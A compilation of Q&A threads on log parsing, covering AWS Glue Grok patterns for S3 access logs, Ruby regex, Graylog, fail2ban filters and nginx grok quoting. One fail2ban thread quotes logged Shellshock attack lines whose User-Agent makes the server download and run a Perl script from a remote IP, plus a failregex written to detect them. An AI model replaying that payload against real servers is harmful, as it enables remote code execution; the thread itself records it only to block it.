Glue Classifier fails to classify S3 logs using Grok pattern - amazon-web-services

Problem: Running the crawler with a classifier that has the right Grok pattern doesn't create the table with columns; instead, a table with 0 columns and recordCount 0 is created (but objectCount is 5).
Details: I set up a Glue Crawler to look at an S3 bucket which holds S3 access logs. This Glue Crawler uses a Classifier to classify the columns for each entry in the log file.
The Classifier is set up with the Grok pattern below:
%{NOTSPACE:session_uuid} %{NOTSPACE:bucket_name} \[%{DATA:timestamp}\] %{IP:ip_address} %{NOTSPACE:principle} %{NOTSPACE:request_uuid} %{NOTSPACE:bucket_action} %{NOTSPACE:resource} \"%{DATA:resource_action}\" %{NOTSPACE:http_status} %{NOTSPACE:http_error_msg} %{NOTSPACE:unknown1} %{NOTSPACE:unknown2} %{NOTSPACE:unknown3} %{NOTSPACE:unknown4} %{NOTSPACE:url} %{NOTSPACE:client_info} %{GREEDYDATA:rest}
The above Grok pattern successfully matches S3 access logs like the ones below when I tested it with an online Grok tester:
efaeda52d1d3e3aaa719b9cddf4a4dd161157e2f9343635589d5b625ebcba84b my-s3bucket-12345 [12/Dec/2017:13:55:33 +0000] 123.123.123.123 - 2F834DCEE973FF7B REST.HEAD.BUCKET - "HEAD / HTTP/1.1" 400 AuthorizationHeaderMalformed 365 - 6 - "-" "AWSConfig" -
efaeda52d1d3e3aaa719b9cddf4a4dd161157e2f9343635589d5b625ebcba84b my-s3bucket-12345 [12/Dec/2017:14:32:29 +0000] 123.123.123.123 arn:aws:sts::1234567890:assumed-role/DataAccessRole 2F834DCEE973FF7B REST.GET.ACL - "GET /information-prefix/?acl HTTP/1.1" 200 - 622 - 237 - "-" "S3Console/0.4" -

The Grok pattern in the original question was helpful enough for me to get started with setting up my own crawler. However, it is definitely incomplete.
Using the documented Amazon S3 server access log format, I created the pattern below, which I believe is complete. Enjoy!
%{NOTSPACE:bucket_owner} %{NOTSPACE:bucket} \[%{DATA:time}\] %{NOTSPACE:remote_ip} %{NOTSPACE:requester} %{NOTSPACE:request_id} %{NOTSPACE:operation} %{NOTSPACE:key} \"%{DATA:resource_uri}\" %{NOTSPACE:http_status} %{NOTSPACE:error_code} %{NOTSPACE:bytes_sent} %{NOTSPACE:object_size} %{NOTSPACE:total_time} %{NOTSPACE:turn_around_time} \"%{NOTSPACE:referer}\" \"%{DATA:user_agent}\" %{NOTSPACE:version_id} %{NOTSPACE:host_id} %{NOTSPACE:signature_version} %{NOTSPACE:cipher_suite} %{NOTSPACE:authentication_type} %{NOTSPACE:host_header} %{NOTSPACE:tls_version} %{NOTSPACE:access_point_arn}
Note that many of these fields can be null and that Amazon writes - to represent those values. Also note that some of the values are quoted.
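If you prefer to manage the classifier as code rather than through the console, a Grok classifier like the one above can also be registered with boto3. A minimal sketch, assuming AWS credentials are already configured; the classifier name and the classification label are arbitrary example values:

import boto3

# The full pattern from the answer above, split across lines for readability.
GROK_PATTERN = (
    r'%{NOTSPACE:bucket_owner} %{NOTSPACE:bucket} \[%{DATA:time}\] '
    r'%{NOTSPACE:remote_ip} %{NOTSPACE:requester} %{NOTSPACE:request_id} '
    r'%{NOTSPACE:operation} %{NOTSPACE:key} \"%{DATA:resource_uri}\" '
    r'%{NOTSPACE:http_status} %{NOTSPACE:error_code} %{NOTSPACE:bytes_sent} '
    r'%{NOTSPACE:object_size} %{NOTSPACE:total_time} %{NOTSPACE:turn_around_time} '
    r'\"%{NOTSPACE:referer}\" \"%{DATA:user_agent}\" %{NOTSPACE:version_id} '
    r'%{NOTSPACE:host_id} %{NOTSPACE:signature_version} %{NOTSPACE:cipher_suite} '
    r'%{NOTSPACE:authentication_type} %{NOTSPACE:host_header} '
    r'%{NOTSPACE:tls_version} %{NOTSPACE:access_point_arn}'
)

glue = boto3.client("glue")

# "s3-access-log-classifier" and "s3_access_logs" are example names;
# pick whatever fits your own naming scheme.
glue.create_classifier(
    GrokClassifier={
        "Name": "s3-access-log-classifier",
        "Classification": "s3_access_logs",
        "GrokPattern": GROK_PATTERN,
    }
)

The crawler then needs to reference this classifier by name in its custom classifiers list for the pattern to be applied.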

Hope it's not too late. I think %{IP} is causing the problem for you, since it can also match an unwanted portion. Just use %{IPV4} instead of %{IP}, or you can use %{NOTSPACE} as well.
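To see the effect of that change without re-running the crawler each time, the pattern can be checked locally. A small sketch using the third-party pygrok library (pip install pygrok), with %{NOTSPACE} in place of %{IP} and only the fields up to the status code; the field names follow the question's pattern:

from pygrok import Grok

# First sample line from the question, split for readability.
line = (
    'efaeda52d1d3e3aaa719b9cddf4a4dd161157e2f9343635589d5b625ebcba84b '
    'my-s3bucket-12345 [12/Dec/2017:13:55:33 +0000] 123.123.123.123 - '
    '2F834DCEE973FF7B REST.HEAD.BUCKET - "HEAD / HTTP/1.1" 400 '
    'AuthorizationHeaderMalformed 365 - 6 - "-" "AWSConfig" -'
)

# Same field names as the question's pattern, but %{NOTSPACE} instead of %{IP}.
pattern = (
    r'%{NOTSPACE:session_uuid} %{NOTSPACE:bucket_name} \[%{DATA:timestamp}\] '
    r'%{NOTSPACE:ip_address} %{NOTSPACE:principle} %{NOTSPACE:request_uuid} '
    r'%{NOTSPACE:bucket_action} %{NOTSPACE:resource} \"%{DATA:resource_action}\" '
    r'%{NOTSPACE:http_status} %{GREEDYDATA:rest}'
)

print(Grok(pattern).match(line))  # dict of named fields, or None if no match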

Related

Extract a motif from various URL strings with regex in Ruby

I have different types of strings (they are in fact log lines):
2022-08-03T16:20:41 - INFO - server.py - 649 - 192.168.1.24,192.168.1.29 - - [03/Aug/2022 16:20:41] "GET /get_customer_by_id/0024-A HTTP/1.0" 200 554 0.007798
2022-08-03T16:20:56 - INFO - utils.py - 10 - GET - http://192.168.1.24/get_customer_by_id/0025-A
2022-08-03T16:21:13 - INFO - utils.py - 10 - POST - http://192.168.1.24/order
I want to extract the customer id from each get_customer_by_id URL. So for the previous example, I'm looking for 0024-A and 0025-A.
I tried the regex \/get_result\/(.+), but it captures everything up to the end of the line when there is something after the customer id.
You can have a detail of implementation here: https://rubular.com/r/FgBxR1kUyQAYSl
How can I solve this?
Thanks a lot for your help!
I suppose you'd be looking for something like /\/get_customer_by_id\/(\S+)/. This will grab all non-whitespace characters (stopping before the HTTP/1.0 on the first line). If you know the id is always digits, a dash, and a letter, then you could also use something like /\/get_customer_by_id\/(\d+-\w)/. Either way, the id will be in the first capture group (link to info on ruby capture groups).
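For illustration, here is the same capture-group idea expressed with Python's re module (the regex itself carries over to Ruby unchanged):

import re

logs = [
    '2022-08-03T16:20:41 - INFO - server.py - 649 - 192.168.1.24,192.168.1.29 - - '
    '[03/Aug/2022 16:20:41] "GET /get_customer_by_id/0024-A HTTP/1.0" 200 554 0.007798',
    '2022-08-03T16:20:56 - INFO - utils.py - 10 - GET - '
    'http://192.168.1.24/get_customer_by_id/0025-A',
    '2022-08-03T16:21:13 - INFO - utils.py - 10 - POST - http://192.168.1.24/order',
]

# Capture everything after the prefix up to the next whitespace character.
pattern = re.compile(r'/get_customer_by_id/(\S+)')

for log in logs:
    m = pattern.search(log)
    if m:
        print(m.group(1))  # prints 0024-A, then 0025-A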

Grok pattern assistance

Hi, I'm in need of some serious help.
I have logs that I wish to parse using Grok, but the problem I'm having is that they are not always consistent in content or spacing. Here are some obfuscated examples:
title_access_log:ipaddress1, ipaddress2, ipaddress3 - - [14/Nov/2017:08:30:00 +0000] "GET /url HTTP/1.1" 200 198454 - 153261 - 0000fD5b5OSuS2C7ZdhgwqYufJk:GH809 url
title_access_log:ipaddress1, ipaddress2 - - [14/Nov/2017:08:30:00 +0000] "GET /url HTTP/1.1" 200 2326 - 20482 V22843489635e0e42e864037eccb8ad4857500ea 0000BDzHfUFhjJmcs9R4-CyglGS:GH806 url
title_access_log:ipaddress1, ipaddress2 - - [14/Nov/2017:08:30:00 +0000] "POST /url HTTP/1.1" 200 30031 - 17942 - 0000PjpQluI9BZ0w4EDB9o2fow-:GH809 url
I have managed to make a Grok pattern that pulls out everything up to the time and date for logs that contain 2 IPs, but I get stuck going further or when trying to handle logs with 3 IPs.
Has anyone got any advice on how to tackle this?
Graylog is what I'm using to extract the data into, so I do have the option of using formats other than Grok.
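Since Graylog extractors can be plain regular expressions as well as Grok patterns, one rough way to tolerate the variable number of comma-separated IPs is a repeating group. A Python sketch of that idea; the field names after the status code are guesses based on the sample lines:

import re

LOG_RE = re.compile(
    r'^(?P<log_name>[^:]+):'
    r'(?P<client_ips>[^,\s]+(?:,\s*[^,\s]+)*)'  # one or more comma-separated IPs
    r' - - \[(?P<timestamp>[^\]]+)\]'
    r' "(?P<request>[^"]+)"'
    r' (?P<status>\d+) (?P<bytes>\d+) - (?P<time_taken>\d+)'
    r' (?P<session_hash>\S+)'                   # "-" when absent
    r' (?P<request_id>\S+) (?P<url>\S+)$'
)

line = ('title_access_log:ipaddress1, ipaddress2, ipaddress3 - - '
        '[14/Nov/2017:08:30:00 +0000] "GET /url HTTP/1.1" 200 198454 - 153261 - '
        '0000fD5b5OSuS2C7ZdhgwqYufJk:GH809 url')

m = LOG_RE.match(line)
if m:
    fields = m.groupdict()
    # Split the IP list so 2-IP and 3-IP lines are handled the same way.
    fields['client_ips'] = [ip.strip() for ip in fields['client_ips'].split(',')]
    print(fields)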

fail2ban scan for 403 in nginx access logs

I have set up some specific rules on nginx, blocking some URLs and some extensions (aspx, sh, jsp, etc.).
I have also enabled a custom access log file only for 403|429|410 errors, so that I have all my access-denied logs in one place.
My goal is to have fail2ban read this log, and for every GET/POST that ends in a 403 error, the IP should be banned.
1) nginx.conf logs to the custom access log file with this format:
log_format limit '$time_local - $remote_addr "$request" $status';
and this is a log entry:
03/Jan/2017:15:53:01 +0100 - 1.2.3.4 "GET /aaa.jsp HTTP/1.1" 403
2) I have a fail2ban filter like this (taken from here):
^<HOST> .* "(GET|POST) [^"]+" 403
3) I have tried it with fail2ban-regex:
fail2ban-regex /var/log/nginx/access-live-limitbot-website.log /etc/fail2ban/filter.d/nginx-403.conf
and this is the output:
Results
=======
Failregex: 0 total
Ignoreregex: 0 total
Date template hits:
|- [# of hits] date format
| [1] Day/MONTH/Year:Hour:Minute:Second
`-
Lines: 2 lines, 0 ignored, 0 matched, 2 missed
|- Missed line(s):
| 217.19.158.242 "POST /wp-login.php HTTP/1.1" 403
| 03/Jan/2017:15:53:01 +0100 - 217.19.158.242 "GET /aaa.jsp HTTP/1.1" 403
`-
and I never get the entry matching the error code.
Will someone please help me with the regex based on my custom log?
Thank you.
Fail2ban is picky about the date format. Also, for ease of matching, I suggest reordering the items in the log.
For the date format, see the documentation here:
https://www.fail2ban.org/wiki/index.php/MANUAL_0_8
In order for a log line to match your failregex, it actually has to match in two parts: the beginning of the line has to match a timestamp pattern or regex, and the remainder of the line has to match your failregex. If the failregex is anchored with a leading ^, then the anchor refers to the start of the remainder of the line, after the timestamp and intervening whitespace.
The pattern or regex to match the time stamp is currently not documented, and not available for users to read or set. See Debian bug #491253. This is a problem if your log has a timestamp format that fail2ban doesn't expect, since it will then fail to match any lines. Because of this, you should test any new failregex against a sample log line, as in the examples below, to be sure that it will match. If fail2ban doesn't recognize your log timestamp, then you have two options: either reconfigure your daemon to log with a timestamp in a more common format, such as in the example log line above; or file a bug report asking to have your timestamp format included.
For the reordering, something like datetime - status - host (- other stuff) would help create a simple pattern such as 403 <HOST>.
Therefore your log should look like:
03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP/1.1"
and your pattern can be
403 <HOST>
You can run this from the command line to validate it:
fail2ban-regex '03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP/1.1"' '403 <HOST>'
Which produces the output:
Running tests
=============
Use regex line : 403 <HOST>
Use single line: 03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP...
Matched time template Day-Month-Year Hour:Minute:Second
Got time using template Day-Month-Year Hour:Minute:Second
Results
=======
Failregex: 1 total
|- #) [# of hits] regular expression
| 1) [1] 403 <HOST>
`-
Ignoreregex: 0 total
Summary
=======
Addresses found:
[1]
1.2.3.4 (Tue Jan 03 15:53:01 2017)
Date template hits:
2 hit(s): Day-Month-Year Hour:Minute:Second
Success, the total number of match is 1
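For a quick offline check without running fail2ban at all, the same match can be reproduced with a plain regex. A rough sketch, substituting a simple IPv4 group for fail2ban's <HOST> tag (this is not how fail2ban itself expands <HOST>):

import re

# fail2ban applies the failregex to the part of the line after the timestamp;
# a plain search over the whole line is close enough for this check.
failregex = r'403 (?P<host>\d{1,3}(?:\.\d{1,3}){3})'

line = '03-01-2017 15:53:01 403 1.2.3.4 "GET /aaa.jsp HTTP/1.1"'

m = re.search(failregex, line)
print(m.group('host') if m else 'no match')  # prints 1.2.3.4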

fail2ban varnish equivalent to apache-noscript

I currently have a server with 2 IPs, one internal and one external, with Varnish on the external IP and an Apache backend on the internal IP, and fail2ban running pretty much with its default configuration.
Recently the website went down returning 503 errors, and it turned out fail2ban had banned Varnish from talking to the Apache backend via the apache-noscript rule. I have since added an exclusion for that IP address so it will not get banned again, but ideally I would prefer it if the client were banned in future.
From the apache logs
SERVER_IP - - [14/Jan/2015:16:52:57 +0000] "GET /phppath/php HTTP/1.1" 404 438 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS! #";system(\"wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*\");'"
From the varnish logs
CLIENT_IP - - [14/Jan/2015:16:52:57 +0000] "GET http://SERVER_IP/phppath/php HTTP/1.1" 404 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*");'"
Would it be okay to just replicate my apache-noscript definition to use the varnish logs, i.e.:
[apache-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/apache*/*error.log
maxretry = 2
to become
[varnish-noscript]
enabled = true
port = http,https
filter = apache-noscript
logpath = /var/log/varnish/varnishncsa.log
maxretry = 2
I have noticed the apache-noscript filter has the following failregex:
failregex = ^%(_apache_error_client)s (File does not exist|script not found or unable to stat): /\S*(\.php|\.asp|\.exe|\.pl)\s*$
^%(_apache_error_client)s script '/\S*(\.php|\.asp|\.exe|\.pl)\S*' not found or unable to stat\s*$
I guess the main question is: will this still work for the varnish log output above, and if not, what failregex would I need?
Many Thanks.
[EDIT] It turns out that, by coincidence, the noscript filter did do the banning, but not for the above log entries. Now to formulate a fail2ban regex for the above log entry.
Okay, I've created a new jail with the following rule to catch the above:
failregex = ^<HOST>.*\[[^]]+\].*\".+\"\s[1-9][0-9][0-9]\s[0-9]+\s\".*\"\s\".*(\/tmp|\/usr\/bin|curl\s+|\s*wget\s+|\.bin\s+).*\"$
Please feel free to suggest improvements to the rule to catch the log line mentioned above.
The failregex works on both the Apache access log and the varnishncsa log.
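One way to sanity-check a failregex like this outside fail2ban is with Python's re module, again substituting a simple IPv4 group for the <HOST> tag and using a simplified stand-in log line (documentation IPs, shell payload trimmed):

import re

# The jail's failregex with <HOST> replaced by an IPv4 group for the test.
failregex = re.compile(
    r'^(?P<host>\d{1,3}(?:\.\d{1,3}){3}).*\[[^\]]+\].*\".+\"\s[1-9][0-9][0-9]'
    r'\s[0-9]+\s\".*\"\s\".*(\/tmp|\/usr\/bin|curl\s+|\s*wget\s+|\.bin\s+).*\"$'
)

# Simplified stand-in for the log lines above.
line = ('198.51.100.7 - - [14/Jan/2015:16:52:57 +0000] '
        '"GET /phppath/php HTTP/1.1" 404 226 "-" '
        '"() { :;}; wget http://198.51.100.8/img.bin -O /tmp/s.pl"')

m = failregex.search(line)
print(m.group('host') if m else 'no match')  # prints 198.51.100.7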

grok - how do you find a quoted string

I am trying to grab the output from an nginx log file and send it to logstash.
10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000] “POST /main/foo.git/git-upload-pack HTTP/1.1” 200 3653189 “-” “git/1.8.3.4 (Apple Git–47)”
Grok is able to find the first 3 words fine
10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000]
%{IPV4:user_ip} - %{USERNAME:user_name} \[%{HTTPDATE:time_local}\]
Grok is able to find the 3rd and 4th words fine
[14/Feb/2014:18:57:05 +0000] “POST /main/foo.git/git-upload-pack HTTP/1.1”
\[%{HTTPDATE:time_local}\] %{QUOTEDSTRING:request}
However, when I combine them and try to find all 4, grok says there are no results (using http://grokdebug.herokuapp.com/ for testing).
10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000] “POST /main/foo.git/git-upload-pack HTTP/1.1”
%{IPV4:user_ip} - %{USERNAME:user_name} \[%{HTTPDATE:time_local}\] %{QUOTEDSTRING:request}
#not found
Anyone know how to get the quoted string in the above example?
I'm brand new to grok, so perhaps I'm not approaching this correctly.
Update
Interestingly, if I use the following log line and then manually type in the URL, it does work:
bob 14/Feb/2014:18:57:05 +0000 "herp"
#Once herp works, replace herp with POST
bob 14/Feb/2014:18:57:05 +0000 "POST"
#Once POST works, keep expanding until the whole thing is in place
autobuild 14/Feb/2014:18:57:05 +0000 "POST /main/builder.git/git-upload-pack HTTP/1.1"
"POST /main/builder.git/git-upload-pack HTTP/1.1" in pattern
"%{WORD:verb} %{URIPATHPARAM:request} HTTP/%{NUMBER:httpversion}"
The process of posting to Stack Overflow identified the problem.
If you look carefully, the double quotes are different characters:
"POST
vs
“POST
Manually typing in the straight double quote fixes the problem.
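If the source log genuinely contained typographic (curly) quotes rather than this being a copy-and-paste artifact, another option would be to normalize them before the grok stage. A small Python sketch of the idea, using an approximation of the sample line above:

# \u201c and \u201d are the curly double quotes seen in the sample line.
line = ('10.1.10.20 - bob [14/Feb/2014:18:57:05 +0000] '
        '\u201cPOST /main/foo.git/git-upload-pack HTTP/1.1\u201d 200 3653189 '
        '\u201c-\u201d \u201cgit/1.8.3.4 (Apple Git-47)\u201d')

# Replace curly quotes with straight ASCII quotes so %{QUOTEDSTRING} can match.
normalized = line.replace('\u201c', '"').replace('\u201d', '"')
print(normalized)

In Logstash itself, this kind of substitution could be done with a mutate/gsub filter ahead of the grok filter.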
Also, you can use this expression for the cases where the log format changes:
"%{WORD:verb}(?:| %{URIPATHPARAM:request})(?:| HTTP/%{NUMBER:httpversion})"
It matches:
"POST /main/builder.git/git-upload-pack HTTP/1.1"
or
"POST /main/builder.git/git-upload-pack"
or
"POST"
try it.. ;)